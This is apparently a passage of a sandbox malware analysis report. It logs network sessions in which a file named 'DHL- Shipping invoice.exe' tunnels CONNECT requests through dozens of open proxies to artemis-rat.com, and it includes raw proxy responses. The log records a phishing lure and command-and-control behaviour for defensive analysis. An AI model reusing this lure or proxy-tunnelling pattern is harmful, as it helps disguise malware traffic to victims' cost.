                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1129192.168.2.45335949.228.131.16950006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.789644957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.152347088 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1130192.168.2.45155750.63.12.33451346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.791357994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.860244989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932694912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.953288078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.952915907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1131192.168.2.453463157.185.157.151265896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.793391943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1132192.168.2.453428107.173.146.53156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.801881075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1133192.168.2.453371185.101.16.52806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.805041075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1134192.168.2.453373194.53.158.57532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.806826115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343744040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1135192.168.2.453362175.183.82.221806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.811435938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1136192.168.2.45334958.253.210.12288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.816445112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1137192.168.2.453378177.12.118.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.820605993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1138192.168.2.453461158.255.215.5090056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.829654932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.998655081 CET339INHTTP/1.1 403 Forbidden
                            Server: squid/4.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 5
                            X-Squid-Error: TCP_RESET 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from proxy.wakoopa.com
                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                            Connection: keep-alive
                            Data Raw: 72 65 73 65 74
                            Data Ascii: reset


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1139192.168.2.453449140.82.35.234444446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.832679033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.168190002 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1140192.168.2.453476159.65.77.16885856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.832688093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1141192.168.2.45341779.110.202.13180816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.842012882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1142192.168.2.45342989.36.114.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.848196030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.452898026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1143192.168.2.45346449.13.161.231806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.848409891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1144192.168.2.453368139.129.202.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.848411083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.166970015 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1145192.168.2.453494172.67.182.85806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.848507881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.935791969 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1146192.168.2.45340089.35.237.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.852127075 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:04.486808062 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:04.540702105 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1f e0 28 f5 d0 47 5d e5 bf 09 66 f4 d9 e0 9e 0d 0e 24 05 c0 9a 73 54 f3 db da 9c d7 d7 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e(G]f$sT*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:05.409411907 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1147192.168.2.45347845.71.184.13480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.855801105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343719959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046947956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.141179085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.103640079 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1148192.168.2.453442195.138.65.3456786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.863027096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1149192.168.2.451607146.19.106.193123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.864471912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1150192.168.2.45350392.204.134.38256756484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.866051912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250016928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750132084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
